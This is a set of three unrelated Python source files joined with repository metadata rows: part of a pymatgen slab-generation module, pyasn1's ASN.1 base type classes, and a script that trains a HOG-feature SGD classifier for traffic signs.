# Get a matrix of whole numbers (ints)
lcm = lambda a, b: a * b // math.gcd(a, b)
reduced_transf = reduce(lcm, [int(1 / i) for i in itertools.chain(*transf) if i != 0]) * transf
reduced_transf = reduced_transf.astype(int)
# perform the transformation
t_hkl = np.dot(reduced_transf, miller_index)
d = abs(reduce(gcd, t_hkl))
t_hkl = np.array([int(i / d) for i in t_hkl])
# get mostly positive oriented Miller index
if len([i for i in t_hkl if i < 0]) > 1:
t_hkl *= -1
return tuple(t_hkl)
def generate_all_slabs(structure, max_index, min_slab_size, min_vacuum_size,
bonds=None, tol=0.1, ftol=0.1, max_broken_bonds=0,
lll_reduce=False, center_slab=False, primitive=True,
max_normal_search=None, symmetrize=False, repair=False,
include_reconstructions=False, in_unit_planes=False):
"""
A function that finds all different slabs up to a certain miller index.
Slabs oriented under certain Miller indices that are equivalent to other
slabs in other Miller indices are filtered out using symmetry operations
to get rid of any repetitive slabs. For example, under symmetry operations,
CsCl has equivalent slabs in the (0,0,1), (0,1,0), and (1,0,0) direction.
Args:
structure (Structure): Initial input structure. Note that to
ensure that the miller indices correspond to usual
crystallographic definitions, you should supply a conventional
unit cell structure.
max_index (int): The maximum Miller index to go up to.
min_slab_size (float): In Angstroms
min_vacuum_size (float): In Angstroms
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
tol (float): General tolerance parameter for getting primitive
cells and matching structures.
ftol (float): Threshold parameter in fcluster in order to check
if two atoms are lying on the same plane. Default thresh set
to 0.1 Angstrom in the direction of the surface normal.
max_broken_bonds (int): Maximum number of allowable broken bonds
for the slab. Use this to limit # of slabs (some structures
may have a lot of slabs). Defaults to zero, which means no
defined bonds must be broken.
lll_reduce (bool): Whether to perform an LLL reduction on the
eventual structure.
center_slab (bool): Whether to center the slab in the cell with
equal vacuum spacing from the top and bottom.
primitive (bool): Whether to reduce any generated slabs to a
primitive cell (this does **not** mean the slab is generated
from a primitive cell, it simply means that after slab
generation, we attempt to find shorter lattice vectors,
which lead to less surface area and smaller cells).
max_normal_search (int): If set to a positive integer, the code will
conduct a search for a normal lattice vector that is as
perpendicular to the surface as possible by considering
multiple linear combinations of lattice vectors up to
max_normal_search. This has no bearing on surface energies,
but may be useful as a preliminary step to generating slabs
for adsorption and other purposes. It is typical that this will
not be the smallest possible cell for simulation. Normality
is not guaranteed, but the oriented cell will have the c
vector as normal as possible (within the search range) to the
surface. A value of up to the max absolute Miller index is
usually sufficient.
symmetrize (bool): Whether or not to ensure the surfaces of the
slabs are equivalent.
repair (bool): Whether to repair terminations with broken bonds
or just omit them
include_reconstructions (bool): Whether to include reconstructed
slabs available in the reconstructions_archive.json file.
"""
all_slabs = []
for miller in get_symmetrically_distinct_miller_indices(structure,
max_index):
gen = SlabGenerator(structure, miller, min_slab_size,
min_vacuum_size, lll_reduce=lll_reduce,
center_slab=center_slab, primitive=primitive,
max_normal_search=max_normal_search,
in_unit_planes=in_unit_planes)
slabs = gen.get_slabs(bonds=bonds, tol=tol, ftol=ftol, symmetrize=symmetrize,
max_broken_bonds=max_broken_bonds, repair=repair)
if len(slabs) > 0:
logger.debug("%s has %d slabs... " % (miller, len(slabs)))
all_slabs.extend(slabs)
if include_reconstructions:
sg = SpacegroupAnalyzer(structure)
symbol = sg.get_space_group_symbol()
# enumerate through all possible reconstructions in the
# archive available for this particular structure (spacegroup)
for name, instructions in reconstructions_archive.items():
if "base_reconstruction" in instructions.keys():
instructions = reconstructions_archive[instructions["base_reconstruction"]]
if instructions["spacegroup"]["symbol"] == symbol:
# check if this reconstruction has a max index
# equal or less than the given max index
if max(instructions["miller_index"]) > max_index:
continue
recon = ReconstructionGenerator(structure, min_slab_size,
min_vacuum_size, name)
all_slabs.extend(recon.build_slabs())
return all_slabs
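# Illustrative sketch (not part of the original module): a hedged, one-call
# survey of every distinct surface of a structure up to a maximum Miller
# index, as described in the docstring above. The fcc Al cell and the 10 A
# slab/vacuum sizes are illustrative assumptions; the helper is never called
# at import time.
def _example_generate_all_slabs():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    al = Structure.from_spacegroup("Fm-3m", Lattice.cubic(4.05),
                                   ["Al"], [[0, 0, 0]])
    slabs = generate_all_slabs(al, max_index=1, min_slab_size=10,
                               min_vacuum_size=10, center_slab=True)
    # Group the generated slabs by the Miller index of their surface
    by_hkl = {}
    for slab in slabs:
        by_hkl.setdefault(slab.miller_index, []).append(slab)
    return by_hkl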
def get_slab_regions(slab, blength=3.5):
"""
Function to get the ranges of the slab regions. Useful for discerning where
the slab ends and vacuum begins if the slab is not fully within the cell
Args:
slab (Structure): Structure object modelling the surface
blength (float, Ang): The bond length between atoms. You generally
want this value to be larger than the actual bond lengths in
order to find atoms that are part of the slab
"""
fcoords, indices, all_indices = [], [], []
for site in slab:
# find sites with c < 0 (noncontiguous)
neighbors = slab.get_neighbors(site, blength, include_index=True,
include_image=True)
for nn in neighbors:
if nn[0].frac_coords[2] < 0:
# sites are noncontiguous within cell
fcoords.append(nn[0].frac_coords[2])
indices.append(nn[-2])
if nn[-2] not in all_indices:
all_indices.append(nn[-2])
if fcoords:
# If slab is noncontiguous, locate the lowest
# site within the upper region of the slab
while fcoords:
last_fcoords = copy.copy(fcoords)
last_indices = copy.copy(indices)
site = slab[indices[fcoords.index(min(fcoords))]]
neighbors = slab.get_neighbors(site, blength, include_index=True,
include_image=True)
fcoords, indices = [], []
for nn in neighbors:
if 1 > nn[0].frac_coords[2] > 0 and \
nn[0].frac_coords[2] < site.frac_coords[2]:
# sites are noncontiguous within cell
fcoords.append(nn[0].frac_coords[2])
indices.append(nn[-2])
if nn[-2] not in all_indices:
all_indices.append(nn[-2])
# Now locate the highest site within the lower region of the slab
upper_fcoords = []
for site in slab:
if all([nn[-1] not in all_indices for nn in
slab.get_neighbors(site, blength,
include_index=True)]):
upper_fcoords.append(site.frac_coords[2])
coords = copy.copy(last_fcoords) if not fcoords else copy.copy(fcoords)
min_top = slab[last_indices[coords.index(min(coords))]].frac_coords[2]
ranges = [[0, max(upper_fcoords)], [min_top, 1]]
else:
# If the entire slab region is within the slab cell, just
# set the range as the highest and lowest site in the slab
sorted_sites = sorted(slab, key=lambda site: site.frac_coords[2])
ranges = [[sorted_sites[0].frac_coords[2],
sorted_sites[-1].frac_coords[2]]]
return ranges
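# Illustrative sketch (not part of the original module): get_slab_regions is
# handy when a slab wraps around the cell boundary; the returned fractional
# ranges bracket the atomic region(s) along c. The uncentered Cu slab below is
# an illustrative assumption; the helper is never called at import time.
def _example_slab_regions():
    from pymatgen.core.lattice import Lattice
    from pymatgen.core.structure import Structure
    cu = Structure(Lattice.cubic(3.6), ["Cu"] * 4,
                   [[0, 0, 0], [0.5, 0.5, 0], [0.5, 0, 0.5], [0, 0.5, 0.5]])
    slab = SlabGenerator(cu, (1, 1, 1), 10, 10, center_slab=False).get_slab()
    ranges = get_slab_regions(slab)  # e.g. [[cmin, cmax]] in fractional coords
    return ranges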
def miller_index_from_sites(lattice, coords, coords_are_cartesian=True,
round_dp=4, verbose=True):
"""
Get the Miller index of a plane from a list of site coordinates.
A minimum of 3 sets of coordinates are required. If more than 3 sets of
coordinates are given, the best plane that minimises the distance to all
points will be calculated.
Args:
lattice (list or Lattice): A 3x3 lattice matrix or `Lattice` object (for
example obtained from Structure.lattice).
coords (iterable): A list or numpy array of coordinates. Can be
cartesian or fractional coordinates. If more than three sets of
coordinates are provided, the best plane that minimises the
distance to all sites will be calculated.
coords_are_cartesian (bool, optional): Whether the coordinates are
in cartesian space. If using fractional coordinates set to False.
round_dp (int, optional): The number of decimal places to round the
miller index to.
verbose (bool, optional): Whether to print warnings.
Returns:
(tuple): The Miller index.
"""
if not isinstance(lattice, Lattice):
lattice = Lattice(lattice)
return lattice.get_miller_index_from_coords(
coords, coords_are_cartesian=coords_are_cartesian, round_dp=round_dp,
verbose=verbose)
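# --- Usage sketch (added illustration) ---
# Recover the Miller index of the plane through three cartesian points in a
# cubic cell with a = 4 A; the plane x + y + z = 2 should reduce to (1, 1, 1).
from pymatgen.core import Lattice

cubic = Lattice.cubic(4.0)
print(miller_index_from_sites(cubic, [[0, 0, 2], [2, 0, 0], [0, 2, 0]]))  # expected (1, 1, 1)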
def center_slab(slab):
"""
The goal here is to ensure the center of the slab region
is centered close to c=0.5. This makes it easier to
find the surface sites and apply operations like doping.
There are three cases where the slab is not centered:
1. The slab region is completely between two vacuums in the
box but not necessarily centered. We simply shift the
slab by the difference in its center of mass and 0.5
along the c direction.
2. The slab completely spills outside the box from the bottom
and into the top. This makes it incredibly difficult to
locate surface sites. We iterate through all sites that
spill over (z>c) and shift all sites such that this specific
site is now on the other side. Repeat for all sites with z>c.
3. This is a simpler case of scenario 2. Either the top or bottom
slab sites are at c=0 or c=1. Treat as scenario 2.
Args:
slab (Slab): Slab structure to center
Returns:
Returns a centered slab structure
"""
# get a reasonable r cutoff to sample neighbors
bdists = sorted([nn[1] for nn in
slab.get_neighbors(slab[0], 10) if nn[1] > 0])
r = bdists[0] * 3
all_indices = [i for i, site in enumerate(slab)]
# check if structure is case 2 or 3, shift all the
# sites up to the other side until it is case 1
for site in slab:
if any([nn[1] > slab.lattice.c for nn
in slab.get_neighbors(site, r)]):
shift = 1 - site.frac_coords[2] + 0.05
slab.translate_sites(all_indices, [0, 0, shift])
# now the slab is case 1, shift the center of mass of the slab to 0.5
weights = [s.species.weight for s in slab]
center_of_mass = np.average(slab.frac_coords,
weights=weights, axis=0)
shift = 0.5 - center_of_mass[2]
slab.translate_sites(all_indices, [0, 0, shift])
return slab
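# --- Usage sketch (added illustration) ---
# After centering, the mass-weighted mean fractional c coordinate should sit
# near 0.5. `uncentered_slab` is an assumed pymatgen Slab that spills over the
# cell boundary.
import numpy as np

centered = center_slab(uncentered_slab)
masses = [site.species.weight for site in centered]
print(np.average(centered.frac_coords, weights=masses, axis=0)[2])  # ~0.5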
def reduce_vector(vector):
# small function to reduce vectors
d = abs(reduce(gcd, vector))
vector = tuple([int(i / d) for i in vector])
return vector
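# --- Usage sketch (added illustration) ---
# reduce_vector divides out the greatest common divisor of the components:
print(reduce_vector((2, 4, 6)))  # -> (1, 2, 3)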
| 45.093734
| 112
| 0.599313
|
1b54d8d24a9c5c39de4c9cd54795773506b7f991
| 19,368
|
py
|
Python
|
src/pyasn1/type/base.py
|
MarletteFunding/aws-kube-codesuite
|
ab4e5ce45416b83bffb947ab8d234df5437f4fca
|
[
"Apache-2.0"
] | 184
|
2017-12-20T21:50:06.000Z
|
2022-03-19T13:24:58.000Z
|
src/pyasn1/type/base.py
|
MarletteFunding/aws-kube-codesuite
|
ab4e5ce45416b83bffb947ab8d234df5437f4fca
|
[
"Apache-2.0"
] | 15
|
2018-01-17T17:30:51.000Z
|
2021-12-16T14:25:09.000Z
|
src/pyasn1/type/base.py
|
MarletteFunding/aws-kube-codesuite
|
ab4e5ce45416b83bffb947ab8d234df5437f4fca
|
[
"Apache-2.0"
] | 136
|
2018-01-09T22:52:06.000Z
|
2022-02-24T13:26:18.000Z
|
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
import sys
from pyasn1.type import constraint, tagmap, tag
from pyasn1.compat import calling
from pyasn1 import error
__all__ = ['Asn1Item', 'Asn1ItemBase', 'AbstractSimpleAsn1Item', 'AbstractConstructedAsn1Item']
class Asn1Item(object):
@classmethod
def getTypeId(cls, increment=1):
try:
Asn1Item._typeCounter += increment
except AttributeError:
Asn1Item._typeCounter = increment
return Asn1Item._typeCounter
class Asn1ItemBase(Asn1Item):
#: Set or return a :py:class:`~pyasn1.type.tag.TagSet` object representing
#: ASN.1 tag(s) associated with |ASN.1| type.
tagSet = tag.TagSet()
#: Default :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
#: object imposing constraints on initialization values.
subtypeSpec = constraint.ConstraintsIntersection()
# Disambiguation ASN.1 types identification
typeId = None
def __init__(self, **kwargs):
readOnly = {
'tagSet': self.tagSet,
'subtypeSpec': self.subtypeSpec
}
readOnly.update(kwargs)
self.__dict__.update(readOnly)
self._readOnly = readOnly
def __setattr__(self, name, value):
if name[0] != '_' and name in self._readOnly:
raise error.PyAsn1Error('read-only instance attribute "%s"' % name)
self.__dict__[name] = value
@property
def readOnly(self):
return self._readOnly
@property
def effectiveTagSet(self):
"""For |ASN.1| type is equivalent to *tagSet*
"""
return self.tagSet # used by untagged types
@property
def tagMap(self):
"""Return a :class:`~pyasn1.type.tagmap.TagMap` object mapping ASN.1 tags to ASN.1 objects within callee object.
"""
return tagmap.TagMap({self.tagSet: self})
def isSameTypeWith(self, other, matchTags=True, matchConstraints=True):
"""Examine |ASN.1| type for equality with other ASN.1 type.
ASN.1 tags (:py:mod:`~pyasn1.type.tag`) and constraints
(:py:mod:`~pyasn1.type.constraint`) are examined when carrying
out ASN.1 types comparison.
No Python inheritance relationship between PyASN1 objects is considered.
Parameters
----------
other: a pyasn1 type object
Class instance representing ASN.1 type.
Returns
-------
: :class:`bool`
:class:`True` if *other* is |ASN.1| type,
:class:`False` otherwise.
"""
return (self is other or
(not matchTags or self.tagSet == other.tagSet) and
(not matchConstraints or self.subtypeSpec == other.subtypeSpec))
def isSuperTypeOf(self, other, matchTags=True, matchConstraints=True):
"""Examine |ASN.1| type for subtype relationship with other ASN.1 type.
ASN.1 tags (:py:mod:`~pyasn1.type.tag`) and constraints
(:py:mod:`~pyasn1.type.constraint`) are examined when carrying
out ASN.1 types comparison.
No Python inheritance relationship between PyASN1 objects is considered.
Parameters
----------
other: a pyasn1 type object
Class instance representing ASN.1 type.
Returns
-------
: :class:`bool`
:class:`True` if *other* is a subtype of |ASN.1| type,
:class:`False` otherwise.
"""
return (not matchTags or
(self.tagSet.isSuperTagSetOf(other.tagSet)) and
(not matchConstraints or self.subtypeSpec.isSuperTypeOf(other.subtypeSpec)))
@staticmethod
def isNoValue(*values):
for value in values:
if value is not None and value is not noValue:
return False
return True
# backward compatibility
def getTagSet(self):
return self.tagSet
def getEffectiveTagSet(self):
return self.effectiveTagSet
def getTagMap(self):
return self.tagMap
def getSubtypeSpec(self):
return self.subtypeSpec
def hasValue(self):
return self.isValue
class NoValue(object):
"""Create a singleton instance of NoValue class.
NoValue object can be used as an initializer on PyASN1 type class
instantiation to represent ASN.1 type rather than ASN.1 data value.
No operations other than type comparison can be performed on
a PyASN1 type object.
"""
skipMethods = ('__getattribute__', '__getattr__', '__setattr__', '__delattr__',
'__class__', '__init__', '__del__', '__new__', '__repr__',
'__qualname__', '__objclass__', 'im_class', '__sizeof__')
_instance = None
def __new__(cls):
if cls._instance is None:
def getPlug(name):
def plug(self, *args, **kw):
raise error.PyAsn1Error('Uninitialized ASN.1 value ("%s" attribute looked up)' % name)
return plug
op_names = [name
for typ in (str, int, list, dict)
for name in dir(typ)
if (name not in cls.skipMethods and
name.startswith('__') and
name.endswith('__') and
calling.callable(getattr(typ, name)))]
for name in set(op_names):
setattr(cls, name, getPlug(name))
cls._instance = object.__new__(cls)
return cls._instance
def __getattr__(self, attr):
if attr in self.skipMethods:
raise AttributeError('attribute %s not present' % attr)
raise error.PyAsn1Error('No value for "%s"' % attr)
def __repr__(self):
return '%s()' % self.__class__.__name__
noValue = NoValue()
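# --- Behaviour sketch (added illustration, not part of pyasn1 itself) ---
# The noValue singleton refuses to act like a value: anything beyond identity
# checks raises PyAsn1Error, which is how uninitialized schema objects fail fast.
sentinel = NoValue()
assert sentinel is noValue            # __new__ always hands back the same instance
try:
    sentinel + 1                      # __add__ is one of the plugged methods
except error.PyAsn1Error as exc:
    print(exc)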
# Base class for "simple" ASN.1 objects. These are immutable.
class AbstractSimpleAsn1Item(Asn1ItemBase):
#: Default payload value
defaultValue = noValue
def __init__(self, value=noValue, **kwargs):
Asn1ItemBase.__init__(self, **kwargs)
if value is noValue or value is None:
value = self.defaultValue
else:
value = self.prettyIn(value)
try:
self.subtypeSpec(value)
except error.PyAsn1Error:
exType, exValue, exTb = sys.exc_info()
raise exType('%s at %s' % (exValue, self.__class__.__name__))
self._value = value
def __repr__(self):
representation = []
if self._value is not self.defaultValue:
representation.append(self.prettyOut(self._value))
if self.tagSet is not self.__class__.tagSet:
representation.append('tagSet=%r' % (self.tagSet,))
if self.subtypeSpec is not self.__class__.subtypeSpec:
representation.append('subtypeSpec=%r' % (self.subtypeSpec,))
return '%s(%s)' % (self.__class__.__name__, ', '.join(representation))
def __str__(self):
return str(self._value)
def __eq__(self, other):
return self is other and True or self._value == other
def __ne__(self, other):
return self._value != other
def __lt__(self, other):
return self._value < other
def __le__(self, other):
return self._value <= other
def __gt__(self, other):
return self._value > other
def __ge__(self, other):
return self._value >= other
if sys.version_info[0] <= 2:
def __nonzero__(self):
return self._value and True or False
else:
def __bool__(self):
return self._value and True or False
def __hash__(self):
return hash(self._value)
@property
def isValue(self):
"""Indicate if |ASN.1| object represents ASN.1 type or ASN.1 value.
In other words, if *isValue* is `True`, then the ASN.1 object is
initialized.
Returns
-------
: :class:`bool`
:class:`True` if object represents ASN.1 value and type,
:class:`False` if object represents just ASN.1 type.
Note
----
There is an important distinction between PyASN1 type and value objects.
The PyASN1 type objects can only participate in ASN.1 type
operations (subtyping, comparison etc) and serve as a
blueprint for serialization codecs to resolve ambiguous types.
The PyASN1 value objects can additionally participate in most
of built-in Python operations.
"""
return self._value is not noValue
def clone(self, value=noValue, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *clone()* method will replace corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`tuple`, :class:`str` or |ASN.1| object
Initialization value to pass to new ASN.1 object instead of
inheriting one from the caller.
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing ASN.1 tag(s) to use in new object instead of inheriting from the caller
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing ASN.1 subtype constraint(s) to use in new object instead of inheriting from the caller
Returns
-------
:
new instance of |ASN.1| type/value
"""
if value is noValue or value is None:
if not kwargs:
return self
value = self._value
initializers = self.readOnly.copy()
initializers.update(kwargs)
return self.__class__(value, **initializers)
def subtype(self, value=noValue, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *subtype()* method will be added to the corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`tuple`, :class:`str` or |ASN.1| object
Initialization value to pass to new ASN.1 object instead of
inheriting one from the caller.
implicitTag: :py:class:`~pyasn1.type.tag.Tag`
Implicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
explicitTag: :py:class:`~pyasn1.type.tag.Tag`
Explicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Add ASN.1 constraints object to one of the caller, then
use the result as new object's ASN.1 constraints.
Returns
-------
:
new instance of |ASN.1| type/value
"""
if value is noValue or value is None:
if not kwargs:
return self
value = self._value
initializers = self.readOnly.copy()
implicitTag = kwargs.pop('implicitTag', None)
if implicitTag is not None:
initializers['tagSet'] = self.tagSet.tagImplicitly(implicitTag)
explicitTag = kwargs.pop('explicitTag', None)
if explicitTag is not None:
initializers['tagSet'] = self.tagSet.tagExplicitly(explicitTag)
for arg, option in kwargs.items():
initializers[arg] += option
return self.__class__(value, **initializers)
def prettyIn(self, value):
return value
def prettyOut(self, value):
return str(value)
def prettyPrint(self, scope=0):
"""Provide human-friendly printable object representation.
Returns
-------
: :class:`str`
human-friendly type and/or value representation.
"""
if self.isValue:
return self.prettyOut(self._value)
else:
return '<no value>'
# XXX Compatibility stub
def prettyPrinter(self, scope=0):
return self.prettyPrint(scope)
# noinspection PyUnusedLocal
def prettyPrintType(self, scope=0):
return '%s -> %s' % (self.tagSet, self.__class__.__name__)
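# --- Usage sketch (added illustration; assumes pyasn1 is installed) ---
# univ.Integer derives from AbstractSimpleAsn1Item, so it illustrates the
# type/value split and the immutable clone()/subtype() pattern documented above.
from pyasn1.type import tag, univ

schema = univ.Integer()                      # type object: carries no payload yet
answer = schema.clone(42)                    # clone() yields an initialized value object
print(schema.isValue, answer.isValue, answer + 1)   # False True 43
retagged = answer.subtype(implicitTag=tag.Tag(
    tag.tagClassContext, tag.tagFormatSimple, 0))
print(retagged.tagSet)                       # re-tagged copy; `answer` is untouched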
#
# Constructed types:
# * There are five of them: Sequence, SequenceOf/SetOf, Set and Choice
# * ASN1 types and values are represented by Python class instances
# * Value initialization is made for defaulted components only
# * Primary method of component addressing is by-position. Data model for base
# type is Python sequence. Additional type-specific addressing methods
# may be implemented for particular types.
# * SequenceOf and SetOf types do not implement any additional methods
# * Sequence, Set and Choice types also implement by-identifier addressing
# * Sequence, Set and Choice types also implement by-asn1-type (tag) addressing
# * Sequence and Set types may include optional and defaulted
# components
# * Constructed types hold a reference to component types used for value
# verification and ordering.
# * Component type is a scalar type for SequenceOf/SetOf types and a list
# of types for Sequence/Set/Choice.
#
def setupComponent():
"""Returns a sentinel value.
Indicates to a constructed type to set up its inner component so that it
can be referred to. This is useful in situations where you want to populate
descendants of a constructed type, which requires being able to refer to
their parent types along the way.
Example
-------
>>> constructed['record'] = setupComponent()
>>> constructed['record']['scalar'] = 42
"""
return noValue
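# --- Usage sketch (added illustration; hypothetical schema) ---
# The constructed-type data model described above in practice: a Sequence with
# two named components, addressed both by name and by position.
from pyasn1.type import namedtype, univ

record_schema = univ.Sequence(componentType=namedtype.NamedTypes(
    namedtype.NamedType('id', univ.Integer()),
    namedtype.NamedType('label', univ.OctetString())))
record = record_schema.clone()
record.setComponentByName('id', 7)
record.setComponentByPosition(1, 'demo')
print(record.prettyPrint())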
class AbstractConstructedAsn1Item(Asn1ItemBase):
#: If `True`, requires exact component type matching,
#: otherwise subtype relation is only enforced
strictConstraints = False
componentType = None
sizeSpec = None
def __init__(self, **kwargs):
readOnly = {
'componentType': self.componentType,
'sizeSpec': self.sizeSpec
}
readOnly.update(kwargs)
Asn1ItemBase.__init__(self, **readOnly)
self._componentValues = []
def __repr__(self):
representation = []
if self.componentType is not self.__class__.componentType:
representation.append('componentType=%r' % (self.componentType,))
if self.tagSet is not self.__class__.tagSet:
representation.append('tagSet=%r' % (self.tagSet,))
if self.subtypeSpec is not self.__class__.subtypeSpec:
representation.append('subtypeSpec=%r' % (self.subtypeSpec,))
representation = '%s(%s)' % (self.__class__.__name__, ', '.join(representation))
if self._componentValues:
for idx, component in enumerate(self._componentValues):
if component is None or component is noValue:
continue
representation += '.setComponentByPosition(%d, %s)' % (idx, repr(component))
return representation
def __eq__(self, other):
return self is other and True or self._componentValues == other
def __ne__(self, other):
return self._componentValues != other
def __lt__(self, other):
return self._componentValues < other
def __le__(self, other):
return self._componentValues <= other
def __gt__(self, other):
return self._componentValues > other
def __ge__(self, other):
return self._componentValues >= other
if sys.version_info[0] <= 2:
def __nonzero__(self):
return self._componentValues and True or False
else:
def __bool__(self):
return self._componentValues and True or False
def _cloneComponentValues(self, myClone, cloneValueFlag):
pass
def clone(self, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *clone()* method will replace corresponding
properties of the |ASN.1| object.
Parameters
----------
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
sizeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 size constraint(s)
Returns
-------
:
new instance of |ASN.1| type/value
"""
cloneValueFlag = kwargs.pop('cloneValueFlag', False)
initializers = self.readOnly.copy()
initializers.update(kwargs)
clone = self.__class__(**initializers)
if cloneValueFlag:
self._cloneComponentValues(clone, cloneValueFlag)
return clone
def subtype(self, **kwargs):
"""Create a copy of a |ASN.1| type or object.
Any parameters to the *subtype()* method will be added to the corresponding
properties of the |ASN.1| object.
Parameters
----------
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
sizeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 size constraint(s)
Returns
-------
:
new instance of |ASN.1| type/value
"""
initializers = self.readOnly.copy()
cloneValueFlag = kwargs.pop('cloneValueFlag', False)
implicitTag = kwargs.pop('implicitTag', None)
if implicitTag is not None:
initializers['tagSet'] = self.tagSet.tagImplicitly(implicitTag)
explicitTag = kwargs.pop('explicitTag', None)
if explicitTag is not None:
initializers['tagSet'] = self.tagSet.tagExplicitly(explicitTag)
for arg, option in kwargs.items():
initializers[arg] += option
clone = self.__class__(**initializers)
if cloneValueFlag:
self._cloneComponentValues(clone, cloneValueFlag)
return clone
def verifySizeSpec(self):
self.sizeSpec(self)
def getComponentByPosition(self, idx):
raise error.PyAsn1Error('Method not implemented')
def setComponentByPosition(self, idx, value, verifyConstraints=True):
raise error.PyAsn1Error('Method not implemented')
def setComponents(self, *args, **kwargs):
for idx, value in enumerate(args):
self[idx] = value
for k in kwargs:
self[k] = kwargs[k]
return self
def __len__(self):
return len(self._componentValues)
def clear(self):
self._componentValues = []
# backward compatibility
def setDefaultComponents(self):
pass
def getComponentType(self):
return self.componentType
| 32.172757
| 120
| 0.618494
|
99acdf9d1b7fc59ebee5a0b6486841c29760478d
| 3,733
|
py
|
Python
|
hog-svm-detection/train.py
|
duytq99/trafficsigns-detection-hog-svm
|
fb0f67b78839f166557cc1c2d81aa4d6ef30394b
|
[
"MIT"
] | null | null | null |
hog-svm-detection/train.py
|
duytq99/trafficsigns-detection-hog-svm
|
fb0f67b78839f166557cc1c2d81aa4d6ef30394b
|
[
"MIT"
] | null | null | null |
hog-svm-detection/train.py
|
duytq99/trafficsigns-detection-hog-svm
|
fb0f67b78839f166557cc1c2d81aa4d6ef30394b
|
[
"MIT"
] | null | null | null |
import os, sys, shutil
import numpy as np
import cv2
from skimage.feature import hog
from sklearn import metrics
from sklearn.linear_model import SGDClassifier
from sklearn.calibration import CalibratedClassifierCV
from imutils import paths
import argparse
import time
import pickle
import random
from tqdm import tqdm
def extract_feature(path):
print("[INFO] extracting training features from {}...".format(path))
data = []
labels = []
filenames = []
index = 0
for imagePath in tqdm(paths.list_images(path)):
index +=1
make = os.path.basename(os.path.dirname(imagePath))  # class label = parent folder name, portable across OSes
# load the image, convert it to grayscale, and extract HOG features
image = cv2.imread(imagePath)
try:
gray = cv2.resize(image, (96, 96))
gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
# extract Histogram of Oriented Gradients from the logo
hogFeature = hog(gray,orientations=9,pixels_per_cell=(8, 8),cells_per_block=(2, 2),transform_sqrt=True,visualize=False,block_norm='L2')
data.append(hogFeature)
labels.append(make)
filenames.append(imagePath)
except Exception as err:
print("[WARN] skipping unreadable image {}: {}".format(imagePath, err))
data = np.stack(data, axis=0)
labels = np.stack(labels, axis=0)
print("[INFO] Feature shape: {}".format(data.shape))
return data, labels, filenames
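# --- Feature-size sketch (added illustration) ---
# With the settings above, a 96x96 patch has 12x12 cells of 8x8 px; 2x2-cell
# blocks slide with unit stride, giving 11*11 blocks * 4 cells * 9 orientations
# = 4356 HOG features per image.
import numpy as np
from skimage.feature import hog

probe = np.zeros((96, 96), dtype=np.uint8)
probe_feature = hog(probe, orientations=9, pixels_per_cell=(8, 8),
                    cells_per_block=(2, 2), transform_sqrt=True,
                    visualize=False, block_norm='L2')
print(probe_feature.shape)  # (4356,)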
def main(stage=1):
if stage == 1:
trainPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage1_classifier\train'
valPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage1_classifier\valid'
modelPath = 'models/Stage1-SGD-2-class.sav'
else:
trainPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage2_classifier\train'
valPath = r'C:\Users\QuangDuy\Desktop\bienbao_data\BTL_AI\stage2_classifier\valid'
modelPath = 'models/Stage2-SGD-8-class.sav'
# construct the argument parse and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--training", required=False, default=trainPath, help="Path to the training dataset")
ap.add_argument("-v", "--validation", required=False, default=valPath, help="Path to the validation dataset")
args = vars(ap.parse_args())
# initialize the data matrix and labels
start = time.time()
data_train, labels_train, _ = extract_feature(path=args["training"])
data_val, labels_val, filenames_val = extract_feature(path = args["validation"])
print("[INFO] Finish extracting HoG features. Total time: {}".format(time.time()-start))
# define classifier
start = time.time()
print("[INFO] Training...")
clf = SGDClassifier(learning_rate='optimal', loss='hinge', penalty='l2', alpha=0.01, max_iter=15000, verbose=False, n_jobs=-1, tol=1e-3, early_stopping=True)
# calibration for probability estimation
clf_with_prob = CalibratedClassifierCV(clf)
clf_with_prob.fit(data_train, labels_train)
print("[RESULT] Training accuracy:", clf_with_prob.score(data_train, labels_train))
print("[INFO] Finish training SVM model. Total time: {}".format(time.time()-start))
# save the trained, calibrated SVM classifier to disk
print("[INFO] Saving model...")
pickle.dump(clf_with_prob, open(modelPath, 'wb'))
print('[INFO] Validation accuracy:', clf_with_prob.score(data_val, labels_val))
# print('Test accuracy on Scratch HoG extractor', model2.score(data2, labels))
print("[RESULT] Confusion matrix...")
print(metrics.confusion_matrix(clf_with_prob.predict(data_val), labels_val))
if __name__=='__main__':
main(1)
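# --- Inference sketch (added illustration; path matches modelPath above) ---
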